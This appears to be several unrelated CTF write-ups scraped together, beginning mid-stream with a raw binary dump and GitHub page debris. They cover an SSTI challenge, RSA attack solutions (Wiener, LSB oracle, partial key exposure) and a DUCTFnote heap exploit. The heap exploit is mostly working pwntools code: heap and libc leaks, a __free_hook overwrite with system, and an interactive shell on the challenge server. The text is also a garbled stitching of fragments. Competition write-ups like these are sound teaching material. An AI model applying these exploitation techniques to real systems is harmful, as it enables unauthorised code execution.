xc3N-\x8c\xac\xe5\xe8Y\xd5\xab\xe8\xc9U\xc8\xb3[\xa7\xfb\x13\x903R\xd1v\xcc\x01R\x93\x9b\x12Vt\x95Y\x06#-\xe4N\xa71Q\x06;\xfd0M\xc2u\x0c,*\xef\xda\xe9\xae\xf7\xa6T\xd3\x17\xfac\xe3\xa1\xd1\xac\',\xb1\xb4\xb7\xa5\xeb \r#\x1d6\n\xd4\xe7\xe8t\x15@k\xc9t\xbb\xeb=\x97p9\x9cjI\xd4\x9axT\x8bW\xc2:\x03\xf1[N\x9d\x00\x84=\x98Q\xc8?\x195\xe7\xfe\x03\x8e\x82\xb4\x178\xb6\xf6\x91\xc0\x81\xbb\xf3O\xdbqW\xa9\xeb\xa1#a\xe8\xb2C\xe6\x89R\xa5\x85@\x1a\x85\xb3\x01\xea{\xfe\xcaK\xdb\xb4\x90:O\xc7\x83\xbd\xe5oC\xa3\xf8\xa2\xdc\xc5aR\t{\xf0Ph/9:,\xf6\xfe\x83,\x1e\xcc\\\xa5\x0f\x7f\x07\xfe\xe7\xa7\xf2\\t$\xf2&\xe4\xa8{(\xa3\xa1\xbc\x7f1r\xde-\x14*\x17\xbe3\xd8X\xb7\x90\xa9\xba\xaeWJ\x83\xd6\xf8$\x88\x87\xb0\x81\xd94Rg\x81$9kB?\xae\x1f\xdaTzl\xc9u?\x10\xcc$O\xeb\xaf~rH\\\x84\xf7\xb7\x9eO\x89Y\xa3\xeb;N\xf9\xe9\xf9\xce~@\xe4\xd7\xc8\xe7\xb6p\xc4\x95X]=\x18\xadGcI\xfd[u\xd2\x8d)\xb0\xcfe\xf0\xa7r\x05\x91,HrM\xa4\xec`\xce\xf8\x9a\x99\x94S\x9f5\x81E|?#\x1a\x02H\xc4#\x81\x0b\xe7\xf7\x16>OR\xba\n\xef\x0c\xb9\xc02\xe4\xd0\x15\xd7k\x0f\x96\xb2\x1c\xa8\x8a\x8f;\xaa\xde\xe82\xd6?~\x874\xb1\xe0\x14\xa6\x924\x18\xe0\x160\xabv\x95\xed;\xe2\x8ct\rjT\xc0\\U\xeb\t\x95\x890\xa3\x05\x16\xdb\xe3?\x82\xe5\rW=++u\x14\x93\x18\x08\xdc-?\xd9pD\xb2\x8b\xa4\xb3p\xf4\x19\x00C\xdfO\xe5:\xee\xf4TH\x19K\x7f\xdc{\x92\xd3\xe8\xb9]\x07r\x12\xf6\x80\xec\xafN4\xf1,<\xb3R\x1ar}\x84\xd8\xfa\x16\xbd\x16\x172\xd8\xdd\xd5kp\x91\x05\x13\xa2,sz\x93M\xae[\x8a\n\xf1;\xa9J\x00\xb5`=MumVN\xcb\xd1\xaf\xf9\xedx\xaf\xd1Zo\x82\xbb\xd1\n\xa0:(\x05Tu2\xe7j\x7f\xb9\x83\xee\xb1P\xac\x06\x91\x1b\x12\x13K1\xff\x00\x9f\x05\x0bZ,ND\xd1\xbb|\t\xf2\x98\x81\x15\x9d\x1a\xb4D\xa8L\xd4\x00\xb4\xa27\x11\xc8\xca\xe7\xe0\x8d\xb8\xdeu\xf8\x0e:\n\xd0GX\xdb\xc1\xbc\xcfe\xdd\xe0\xda\xeb\xa1\xd7\x1e]\x10\x7f\x98\xe5\xe5Y\x98Z\x83^z\x19\xf14t}\x8e\xa6\xe7\xc3\x13\x9a\xefE\xc7\xc1\x8fw\xa0\xd2\x1c\xc8i$j\x8f\x05\x9b\x7f_3\xe0\xff\x00\xfd\xcfO\xe4\xb8\xe9s;\xef\xe6\xedBRV\x94\x82C\xb2+\x91\x89}\xb8\r\\\xfb\xcfd\xa9\x973{\xfd\xea\xf7\xd0\xad\xaaH\xc8y\x90\xf1=}\x98\xcb\xd2\xe0V\xf7\x83\xc2\x18(\xe8\x13\x16\x8a\xde\xff\x00\xbf\xbc\x9bw"\x82_Q\x83\xc8co\xe1\xf25fs\xf3\x9c\xfc\x81\xc9\x12\xa6\x93\x1e\xcc\x0f7\xa4\x92F*Aj\xa0\xefS\n\xec\x1a5\xdcrJ)\x1bp\xb4\xf8\x96\x8e?oN\xfaG\xb9\xa5^\xfb\x7f\xe83\xeds\xd0\xb0\x01\x1b\x12\xc9]\x91bK\xd8\xfa3ow=\x16\x1a\xed\xc1\xa8\xf4\x03p`\xd81$_x\xbb\xc4\xecd\xbc\xed\xecD\xddf\xde\xfa\xccZ\xeb\xd8\xf1\x06\x8a\xeeu2\xcb\xdd\x9f\xcc\xdeA\x08\xc1T\x0f\xaa\x1b}\xbd\xce6\x86Udl\x01\xba\xb0H\x97\x08\xec\xad\xee\xba\x1b`\x03\xeaB\x9e\x0f\xff\x00\xfd\x93\xf6\xcc\x0e\xdfX\xfe?\x07\x8b\xcbh~\xc3\x1fp\x0f \xdc\x08t\xb6\xe0\xbc7\x97\xf9\xbeP\x12\xf6\xa9\x8d,\xb1L\x87II\n:;\xa2\x9a\xe8&,\xe8\xd5\x15\x88\x14#-\xf5\xe9\xb5\x9b\xef\xf8\x12\xbf\x03/\xbcF\x91\x8e\xe0\xcf\xddc\xe6\xdb\x9d\xb8\xeb\xa5[\xd3\xed\xbbX\x18\x9a\xae\xefY\xd3H\xc0Y\xfe\xfd4\x8e\xd3{\xe1>\xd7y\x1b\x88\xa7\xb1\x0b\xc0\xec\x1ep\xbat[:@J\xd4o\x0c\x1e\xf5M\x02_}/\xa4TG\xf3\x8b\x80R1WKo\x10\x89d\xbe\x8d\xc1\xb0\'\x1d\xd2\x14\x1b\x81\xf6\xa1\xe0T\x8c\xe0\n\x0bn\x92\x0bV\xb5z.\xe7\xd2Z\x8b\xce\x9f\xf00\x8d\xe9\x93\x84\x18c\xfc\x910t\x85\xa2#4\xb4\xbd\xce\xff\x00\xbc02\\\x03\xd4H\x83\x93B5\xfbm\xfc\xfd*\xe4\xf6\xde\xf4\xdc/\xfd\x82\x03\x01\xa3\x00 "\xcb\x80\xf6\xe84\xfd\xc4\xc2\xa2\xc6\xd4T\x17M\xa5\x81\x13@Z\xc3\xff\x00\xdbI\x9fs\xa7]\x15<\xe5]p\xc2(\xce\xc5h\xa7\x02a\xa6\xc8\xfc\x97\x18\xa3\x0f\xe5\xf5\xe3\xb1=\x14V\xadU\x95\xd3\t\xd4u\xfa;"\xedv\x9d\xe8\x1a\x15W\xcd\xf5\xa0\xc9\x06}]\x06\xc33\xdbO\n\x98\xc8\x95\xd8 \t\x884\x0e\x84\x1e\xee\x03\xba\x1b.RX\xdfB\xd3\x1e\\\xd9\xa5\xb4ND\x80\xe3XT\xa4Z\xb2\xfd\x98\xe5g\xd9\xa9\x96x\x89\x9b\x8d\xc5\xb2bQ|\x0f\xe0`\xb5m\xb0\x05\xac\xc4\xe3\xfcH\xe84\x0bY0LSi\xd8XW(\xa4a:\xf3a\xf5Q\tR\xca\xc28\x08\x0e\xddE\x1b\xa6\x8c\x9a\xc4\xb8b\'\x91) \x97\xea0\xdd\xc6_\x00\xb3\xc553l\xbe\x1f\xc8A\xcc\xf0\xed\x00U_\xd9\xc4@\x8a\xad\xaf\x89J\x88\xaa\xb8h\xe5\xa9\xba[\x9b[`\x0b\xdb\x04\xbd\xd6&\x87g\x05f8\xe4\xdf\xdbR<\xab\x1e\x01I)*%\x914q\xf1\xecl\x03\x05\x94\xdf\x0e\xe0\x81V\xd9`]\xc7\x1b\\w\xf0\x00)9\xfaz\xb8\xefrh\xd5\xf3sa\xd1\x12#\xb8}\xab\xb6\x862\xe7xZ\xa9\xa9\xa3\x03\xbbl\xc1\xba\x9c\xd6\xae\xa1\xd3\xde&\xeb\xeaKb\x15\x0e1:0\x0cs\x04+(\x98a\xff\x00+\x83\xb4\x16=\xfc<0\xe9\xdba\x0b\xe6\xa0\xb5\xcd\x1c\x01\xd0\x08\xf6\xcd\\"\xb3z\x97\x03\x00\xec\x12\xa5{\xd9YP\x15\xc4\x07q\x8c\t\x9c\xc3km\x04A\x11\x82\x9c\xff\x00\xa1z9\x85\x9e*P\x87\xd1\x0e\x02\xb4\x0c\x9e\x81n-$\xf8\xbc\x95\xd7y\xe4qS4\xd5\xea\xa5\x1d\x82s\x89\xd5\x88\xa5\xc5\x14\x89\x84H\xaf\xc7\x93\x92\x9a\xab h\tFv5\x01\x15\xd5J\xa0\x8a\xd8\x0c\x03J\x0c\xfeN\xad#J7liV\x86\xc6\x94\x12\x88.\x02\xd3Q\x9e\xa1\xbc\xba\xe8Sl\xe9\xda\xd5\x9al=\xdb\xfd\xc8\x85\xaa\xdd\xd80\xaeJW\xdc\xd7N\x9eV\xa1\xad<\xe5\x16\xe4+k\x04shi\x1a\xd2\x81\xaf\xc2\x9d\xa0\xa3A\x19\xd8 \xd2Z\x15:\xf6J\x87\x0b\n\x92s\xa4rO\x83\xb0\xbe\xce\x94x7M\xde\xd5\x90"\xef_\x19=\xe8\x86UXr\x80{\x07A\x1c)\x90m\x0bV\xd9\x8f\xdf26\x97\x92\xdcgu\xd0c\xbc\xfb\r\n&*\xab!\xd09\x13\xda\xd5\xe8\xa3\xa0\xc8t\xd9\x1fm\xce\x7f\xa2\xcf\xf4Y\xfe\x8b4\xa8\xe8w\x1aSZQ\x1f\xb5:\xbaj\xd1\xdaB\xa5\x83\xc3\x00\x00!D\x0cXj\xd5\xafb\xa2Q\x94;\xb37r\x7fE\x9f\xe8\xb3\xfd\x16A\x966i\xd8\xb7\x97]\xf0\x97kV\xc5\x85\xd7\xd5&\xa7\x8e\xcb\xa8:\x89\x19$p\xb8\xb3\xbe\xad~\xf8\x98&V\xe1k\xea\xa5Z(\xb9\xa8\xbaj\xe1:\xa7e\xeca\x88(\xf2Fl\x08\xe2#\xba\xca\x88c:\xa7\x01\xc2\'-R\xb7uS\xbd\xf6\x85\x99\xcf6\xfc]\xc1?\xa2\xcf\xf4Y\xfe\x8b6d\xfa\xd4n\xaa\xcb\r\xa4\n\r\x14&\x9f\x85\x08?\xa6\x0e\x88\x07\x82Y\x10\xea$Rb\x89\xcbm\xde"\x00T`\xb8\xac\xaf\xed\xe9\xa6\xe1v\x80\x06\x8a\x1e\x11Q\xd8\x1b\xa8\x06\xf4\xdc\xa6\xd94\xa6\xd3q]\x96\xba\x85\xd8|\xcer\xab\x81\n\xcc\x8d6~\x92\xa0*\xd0e\x96\x9d\xa7:e~\x00\x1e\x05)A\xc3\xa0\xd3T\x85~\x00\x1a)\xd7\xd0\xc2UZs\x8e\xd5\x0fc\x0c7\xdfcr\xe0\x1d\xea\xc4S\xc3i\xb7\xcb\xa6+eA\xf6y%\xac\xaep%\xaf\x93\xbaVW\x06\x94[\xa2\xf6\xb4M\xb0\xcfo+\xadzae\xefvu\xfdzW\xdc\xd2\xf2\x9a\x80\xaa\xf0\x04\xa5\xd9\xb6\x85`\x03\x02?f\x9f\xe4\xc5\x1b%\xe4\x80=\xfapB\xdd\'c\xd9\xe3\xfc\x95H\xa7\x1d\xe0`N%6\xf2\xa8j\x13\xd0\xd0\xe2y(\x8fQ>\xbf\xa7\x0c\xa9\xadc\xee\xe7Y\x81\xff\x00S\x86\xe7\x7f*\xa4\n9N\xd9\xfe\xa8\x10\xed\x8a\xdc\x04b\x95\x0e\r\xfe\xecT&\xc4M\xb7?\xfcl\xdf\xff\xd9'rawdata = bytearray(rawdata)open("flag.jpg","wb").write(rawdata)</div>After converting, you will get flag:<h2><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path fill-rule="evenodd" d="M7.775 3.275a.75.75 0 001.06 1.06l1.25-1.25a2 2 0 112.83 2.83l-2.5 2.5a2 2 0 01-2.83 0 .75.75 0 00-1.06 1.06 3.5 3.5 0 004.95 0l2.5-2.5a3.5 3.5 0 00-4.95-4.95l-1.25 1.25zm-4.69 9.64a2 2 0 010-2.83l2.5-2.5a2 2 0 012.83 0 .75.75 0 001.06-1.06 3.5 3.5 0 00-4.95 0l-2.5 2.5a3.5 3.5 0 004.95 4.95l1.25-1.25a.75.75 0 00-1.06-1.06l-1.25 1.25a2 2 0 01-2.83 0z"></path></svg>Thank you for your reading!</h2></article> </div>
Open the challenge, you will see a register page, but it's fake register page.
With any input, you will receive a page with the information about flag's location.
View source and take a look to comment part, you will see that, it renders your username. So what can we do?
With my experience, maybe username input has a vulnerability name ssti.
Let try with payload {{1+1}}
oh, We get hello 2
No doubt, it's ssti.
This is a basic ssti challenge, no filtered word here. You can easily find payload for this challenge.
Here is my payload, you can refer it:
<em>* Note that you must be read file in binary mode, because this is jpg file</em>
After reading file, let convert the data we read back to jpg file:
<em>* Remember that data you receive is HTML encoded data, you must decode it first.</em>
You can refer my code:
After converting, you will get flag:
</div>
</readme-toc>
<details class="details-reset details-overlay details-overlay-dark" id="jumpto-line-details-dialog"> <summary data-hotkey="l" aria-label="Jump to line"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast linejump" aria-label="Jump to line"> </option></form><form class="js-jump-to-line-form Box-body d-flex" action="" accept-charset="UTF-8" method="get"> <input class="form-control flex-auto mr-3 linejump-input js-jump-to-line-field" type="text" placeholder="Jump to line…" aria-label="Jump to line" autofocus> <button data-close-dialog="" type="submit" data-view-component="true" class="btn"> Go
</button></form> </details-dialog> </details>
<div class="Popover anim-scale-in js-tagsearch-popover" hidden data-tagsearch-url="/dyn20/Writeups-CTF/find-definition" data-tagsearch-ref="branch" data-tagsearch-path="TamilCTF/Open Flag/README.md" data-tagsearch-lang="Markdown" data-hydro-click="{"event_type":"code_navigation.click_on_symbol","payload":{"action":"click_on_symbol","repository_id":391126667,"ref":"branch","language":"Markdown","originating_url":"https://github.com/dyn20/Writeups-CTF/blob/branch/TamilCTF/Open%20Flag/README.md","user_id":null}}" data-hydro-click-hmac="15735790f2313cf06dcc233c9b45d72a2ecedb38f0d5b3491cc2717fdf2599b8"> <div class="Popover-message Popover-message--large Popover-message--top-left TagsearchPopover mt-1 mb-4 mx-auto Box color-shadow-large"> <div class="TagsearchPopover-content js-tagsearch-popover-content overflow-auto" style="will-change:transform;"> </div> </div></div>
</div>
</div></div>
</main> </div>
</div>
<div class="footer container-xl width-full p-responsive" role="contentinfo"> <div class="position-relative d-flex flex-row-reverse flex-lg-row flex-wrap flex-lg-nowrap flex-justify-center flex-lg-justify-between pt-6 pb-2 mt-6 f6 color-fg-muted border-top color-border-muted "> © 2021 GitHub, Inc. Terms Privacy Security Status Docs
<svg aria-hidden="true" height="24" viewBox="0 0 16 16" version="1.1" width="24" data-view-component="true" class="octicon octicon-mark-github"> <path fill-rule="evenodd" d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0016 8c0-4.42-3.58-8-8-8z"></path></svg> Contact GitHub Pricing API Training Blog About </div> <div class="d-flex flex-justify-center pb-6"> <span></span> </div></div>
<div id="ajax-error-message" class="ajax-error-message flash flash-error" hidden> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <button type="button" class="flash-close js-ajax-error-dismiss" aria-label="Dismiss error"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> You can’t perform that action at this time. </div>
<div class="js-stale-session-flash flash flash-warn flash-banner" hidden > <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-alert"> <path fill-rule="evenodd" d="M8.22 1.754a.25.25 0 00-.44 0L1.698 13.132a.25.25 0 00.22.368h12.164a.25.25 0 00.22-.368L8.22 1.754zm-1.763-.707c.659-1.234 2.427-1.234 3.086 0l6.082 11.378A1.75 1.75 0 0114.082 15H1.918a1.75 1.75 0 01-1.543-2.575L6.457 1.047zM9 11a1 1 0 11-2 0 1 1 0 012 0zm-.25-5.25a.75.75 0 00-1.5 0v2.5a.75.75 0 001.5 0v-2.5z"></path></svg> <span>You signed in with another tab or window. Reload to refresh your session.</span> <span>You signed out in another tab or window. Reload to refresh your session.</span> </div> <template id="site-details-dialog"> <details class="details-reset details-overlay details-overlay-dark lh-default color-fg-default hx_rsm" open> <summary role="button" aria-label="Close dialog"></summary> <details-dialog class="Box Box--overlay d-flex flex-column anim-fade-in fast hx_rsm-dialog hx_rsm-modal"> <button class="Box-btn-octicon m-0 btn-octicon position-absolute right-0 top-0" type="button" aria-label="Close dialog" data-close-dialog> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path fill-rule="evenodd" d="M3.72 3.72a.75.75 0 011.06 0L8 6.94l3.22-3.22a.75.75 0 111.06 1.06L9.06 8l3.22 3.22a.75.75 0 11-1.06 1.06L8 9.06l-3.22 3.22a.75.75 0 01-1.06-1.06L6.94 8 3.72 4.78a.75.75 0 010-1.06z"></path></svg> </button> <div class="octocat-spinner my-6 js-details-dialog-spinner"></div> </details-dialog> </details></template>
<div class="Popover js-hovercard-content position-absolute" style="display: none; outline: none;" tabindex="0"> <div class="Popover-message Popover-message--bottom-left Popover-message--large Box color-shadow-large" style="width:360px;"> </div></div>
<template id="snippet-clipboard-copy-button"> <div class="zeroclipboard-container position-absolute right-0 top-0"> <clipboard-copy aria-label="Copy" class="ClipboardButton btn js-clipboard-copy m-2 p-0 tooltipped-no-delay" data-copy-feedback="Copied!" data-tooltip-direction="w"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-copy js-clipboard-copy-icon m-2"> <path fill-rule="evenodd" d="M0 6.75C0 5.784.784 5 1.75 5h1.5a.75.75 0 010 1.5h-1.5a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-1.5a.75.75 0 011.5 0v1.5A1.75 1.75 0 019.25 16h-7.5A1.75 1.75 0 010 14.25v-7.5z"></path><path fill-rule="evenodd" d="M5 1.75C5 .784 5.784 0 6.75 0h7.5C15.216 0 16 .784 16 1.75v7.5A1.75 1.75 0 0114.25 11h-7.5A1.75 1.75 0 015 9.25v-7.5zm1.75-.25a.25.25 0 00-.25.25v7.5c0 .138.112.25.25.25h7.5a.25.25 0 00.25-.25v-7.5a.25.25 0 00-.25-.25h-7.5z"></path></svg> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-check js-clipboard-check-icon color-text-success d-none m-2"> <path fill-rule="evenodd" d="M13.78 4.22a.75.75 0 010 1.06l-7.25 7.25a.75.75 0 01-1.06 0L2.22 9.28a.75.75 0 011.06-1.06L6 10.94l6.72-6.72a.75.75 0 011.06 0z"></path></svg> </clipboard-copy> </div></template>
</body></html>
|
**Author's Solve**
For Part 1, the hint points to Wiener's attack. So, you can use any online tool or Python library to do the continuous fractions needed to solve for the private key. I have used a Python library called owiener to get the private key.
For Part 2, the hint points to the fact that there is a known relationship between the two primes. Therefore, it becomes easy to factorize N and solve for the private key. For the factorization, you need to solve the quadratic equation `p*(p+6) = N`. You can also use Fermat's attack to solve part 2. The script `sexy_primes_solver.sage` is the solver for part 2.
For Part 3, there is a LSB oracle. The server will give you the last bit of the decrypted plaintext of your chosen ciphertext. The idea is to exploit the malleability of RSA: given a plaintext P whose ciphertext is `C = (P^e) % N` , if we multiply C by 2^e we obtain `C' = ((2P)^e) % N` which is the encryption of 2P. From here, we can narrow the range for which P exists by using the LSB. If it is 1, then 2P > N else 2P < N. From this, we can find the plaintext in log N steps. The script to do this manually is `lsb_oracle_solver.py`.
For Part 4, the server has leaked out the lower half bits of the private key. Using this [paper](http://honors.cs.umd.edu/reports/lowexprsa.pdf), we can crack what is the private key. The basic idea is to brute force the possible values for s using the equation `(e*d) % 2^512 = 1+ k*(N-s+1)` where k = [0...e]. Then, we solve the various values for p using the equation `(p^2 - s*p + N) % 2^512 = 0`. Using the various values of p, we substitute it as p0 in the equation `((2^512)*x + p0) % N = 0` and solve for x. We take the GCD of `(2^512)*x + p0` and N to get the actual prime p. Therefore, the factorization is done and the private key can be calculated. The script `partial_key_solver.sage` is the solver for part 4.
NOTE: An unintended solve for Part 4 is to get 17 different ciphertexts and solve the system of equations using Chinese Remainder Theorem. This attack is known as Hastad’s Broadcast Attack. A way to avoid this is to make sure that there is no way to get that many unique ciphertexts.
For the entire script implementation including server interaction, please check out `solution.sage`. |
# DownUnderCTF - DUCTFnote (471 points)
DUCTFnote was a heap exploitation challenge. The main difficulty was that we could only have one active note at a time, so if we create a new note, the old one is no longer accessible.
# Source code analysis
I spotted one bug in the [source code](https://github.com/ret2school/ctf/blob/master/2021/down_under_ctf/pwn/ductf_note/ductfnote.c) which leads to another bug : ```c135 void edit_note(datanote_t * note) {136 if(!note) {137 printf("No Note.\n");138 return;139 }140141 signed char idx = 0;142 while(idx <= note->size) { // note->size can takes values from 0 to 127 (0x7f)143 *(&(note->data)+idx) = fgetc(stdin);144 if (*(&(note->data)+idx) == '\n') {*(&(note->data)+idx) = '\0'; break;}145 idx++;146 }147 }```In the function `edit_note` the condition of the while is incorrect and the loop is executed once too often : `while(idx <= note->size)` should have been `while(idx < note->size)`. Thanks to this bug, we can trigger an integer overflow : `idx` is a `signed char`, we know that a `char` takes 1 byte in memory, so a `signed char` can takes values from -128 to 127, if `note->size` equals 127, then `idx++` will trigger the integer overflow and `idx` will have the value -128, it allows us to write data from `¬e->data - 128` to `¬e->data + 127` (ie before `note->data`).
# Overwriting `param->maxsize`
Using these bugs, we can overwrite `param->maxsize` with `0xffffffff` :```py# set maxsize to 0xffffffff (max value on 4 bytes) -> integer overflow in create_note allows us to malloc small chunkscreate_note(127)edit_note(b"A"*127 + b"B"*85 + p64(0x21) + p32(0xffffffff))```
It allows us to malloc any size and even small size : ```c109 datanote_t * create_note(unsigned int size, param_t *params) {110 if (size > params->maxsize) {111 printf("Note too big.\n");112 return 0;113 }114 int allocsize = size | 0x80;115 datanote_t * note = (datanote_t*)malloc(allocsize + 8);116 note->size = size;117 return note;118 }```We will always skip the `if` as we overwrote `param->maxsize` with the maximal value for an int.
Now, what happen if we pass a size of `0xffffffff` ? :
- we skip the `if` because `0xffffffff > 0xffffffff` is not true- `0xffffffff | 0x80 == 0xffffffff`- `0xffffffff + 8 == 0x7` integer overflow :) , so it calls `malloc(0x7)`- `note->size = 0xffffffff`
This will be useful later.
# Leaking heap base addressLet's take a look at `show_note` : ```c121 void show_note(datanote_t * note) {122 if(!note) {123 printf("No Note.\n");124 return;125 }126127 printf("<------------ NOTE 1 ------------>\n");128 fwrite(&(note->data), note->size, 1, stdout);129 printf("\n");130 printf("<-------------------------------->\n");131 printf("\n");132 }```
With the out-of-bounds write, we can overwrite `note->size`, moreover `fwrite` doesn't care of null bytes so we can leak some data placed after `note->data`. ```pyinfo("leaking heap address...")create_note(0)
create_note(127)delete_note()
create_note(0)delete_note()# this free'd chunk now contains a heap pointer```
We are in this situation : ```┌──────────────────────────────────────────────────┐│ note (size : 0) │├──────────────────────────────────────────────────┤│ free'd note (size : 127) │├──────────────────────────────────────────────────┤│ free'd note (size : 0) (contains a heap pointer) │└──────────────────────────────────────────────────┘```
We now have to create a new note of size 127 and overwite its `note->size` with a higher value : ```pycreate_note(127)# 0x111 : chunk size# 0x1000 : note->sizeedit_note(b"A"*127 + b"B"*117 + p64(0x111) + p32(0x1000) + p32(0xdead))```
We now have this : ```┌──────────────────────────────────────────────────┐│ BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB │├──────────────────────────────────────────────────┤│ active note (size : 0x1000) │├──────────────────────────────────────────────────┤│ free'd note (size : 0) (contains a heap pointer) │└──────────────────────────────────────────────────┘```We juste have have to call `show_note` to get our heap pointer : ```pyheap_base = u64(show_note()[0x114:0x114+8]) - 0x10success(f"heap base @ {hex(heap_base)}")```
# Leaking libc base addressTo get a libc address, we have to free a chunk that will end up in unsorted bin. So the idea is to create a large fake chunk of size 0x500 (large enough to not fit in a tcache bin), add padding to avoid `double free or corruption (!prev)` error caused by the lack of the `PREV_INUSE` bit in the next chunk, and then free this large chunk, malloc will let a libc pointer.
```pyinfo("leaking libc address...")# will be used to leak datacreate_note(0x200)delete_note()
# its size will be changed with 0x500create_note(127)delete_note()
# padding to pass security checks (PREV_INUSE for next chunk)create_note(0x80)# add 2 entries in tcache bin 0x100 - will be useful for write-what-wherefor _ in range(2): create_note(0x80) edit_note(b"A"*127 + b"B"*117 + p64(0x101)) delete_note()
for _ in range(4): create_note(0x80)create_note(0x91) # chunk with note->size=0x91, so if we interpret this value as a chunk size which have PREV_INUSE at the right place to pass security checks
create_note(127)# modify chunk size with 0x501, because it will not fit in tcache bins# so once free'd, the chunk will be in unsorted binedit_note(b"A"*127 + b"B"*117 + p64(0x501))delete_note()
create_note(0x200)edit_note(b"A"*127 + b"B"*117 + p64(0x291) + p32(0x1000))libc_base = u64(show_note()[0x28c:0x28c+8]) - 0x1ebbe0success(f"libc base @ {hex(libc_base)}")
# malloc will use in priority unsorted bin instead of creating new chunks from top chunk```
The chunk in unsorted bin will be used to create other smaller chunks that will overlap already existing chunks, that's why we placed two chunks in tcache bin. It will allows us to overwrite pointers from a free'd chunk and make malloc returns us an arbitrary pointer.
# Overwriting `__free_hook` with `system`
Now that we have overlapping chunks, it remains for us to allocate the right amount of data and overwrite the pointers of the free'd chunks placed in tcache bin in order to make malloc returns us an arbitrary pointer and get a write-what-where primitive.
```pyinfo("overwriting __free_hook with system...")target = libc_base + libc.symbols["__free_hook"] - 8
attach_gdb()create_note(0x2c0)edit_note(b"A"*127 + b"B"*117 + p64(0x2d1) + p64(target) + p64(target))
create_note(0xf0)create_note(0xf0) # addr of targetattach_gdb()edit_note(b"JUNK" + p64(libc_base + libc.symbols["system"]))```
With the write-what-where primitive, we overwrote `__free_hook` with `system`.
# Getting a shell
We now have to free a chunk which contains `/bin/sh` at the beginning (I used the out-of-bounds write for that).
```pycreate_note(127)edit_note(b"A"*127 + b"B"*117 + p64(0xdead) + b"/bin/sh")delete_note()```
The complete exploit is available here : [https://github.com/ret2school/ctf/blob/master/2021/down_under_ctf/pwn/ductf_note/exploit.py](https://github.com/ret2school/ctf/blob/master/2021/down_under_ctf/pwn/ductf_note/exploit.py)
```[+] Opening connection to pwn-2021.duc.tf on port 31917: Done[*] leaking libc address...[+] libc base @ 0x7f201d1c4000[*] leaking heap address...[+] heap base @ 0x55e7f2322000[*] overwriting __free_hook with system...[*] Switching to interactive mode
$ iduid=1000 gid=1000 groups=1000$ ls -latotal 2204drwxr-xr-x 1 65534 65534 4096 Sep 17 12:29 .drwxrwxrwt 7 1000 1000 140 Sep 29 18:04 ..-rw-r--r-- 1 65534 65534 42 Sep 17 11:24 flag.txt-rwxr-xr-x 1 65534 65534 191472 Sep 17 11:24 ld-2.31.so-rwxr-xr-x 1 65534 65534 2029224 Sep 17 11:24 libc.so.6-rwxr-xr-x 1 65534 65534 21832 Sep 17 12:29 pwn$ cat flag.txtDUCTF{n0w_you_4r3_r34dy_f0r_r34l_m$_0d4y}```
---
Thanks to grub and DownUnderCTF team for this cool heap challenge and nice ctf :) |
[Orginal writeup](https://github.com/shyam0904a/TamilCTF/blob/master/README.md#bases-485-points-22-solves) https://github.com/shyam0904a/TamilCTF/blob/master/README.md#bases-485-points-22-solves |
## **University Pwn**
was a pwn challenge from Tamil CTF 2021.
A heap exploitation challenge, I got firstblood on it, let's see what is it...
let's check the protections:

The program present an archetypal heap exploitation menu, covered by a thin layer of obscurity..

so you can create sheets, with various information about a "student".
You can create up to 30 sheets, they incrementally numbered from 0 to 29.
The sheets are recorded on a buffer on stack.
For each sheet, you can allocate a block of a size between 0x18 to 0x88 bytes on heap,
and fill it with "record" data for students.
From the menu, you can also edit the sheet content, including his "record" stored on heap.
You can also view the content of a sheet's record.
And you can delete a record from a sheet.
Each time you create a sheet, an index number is incremented, and you can not create more than 30 sheets. When you free a record, this number is not decremented, and each create sheet will go in the next index.. (no index reuse)
the sheet structure looks like this:

the program has not vulnerabilities like an uaf, double free, overflow or other things...
the vulnerability is somewhere else..devil is in the details as you know.
there are 30 sheets reserved on stack.
### **1: the Vulnerability**
One first thing to note is:
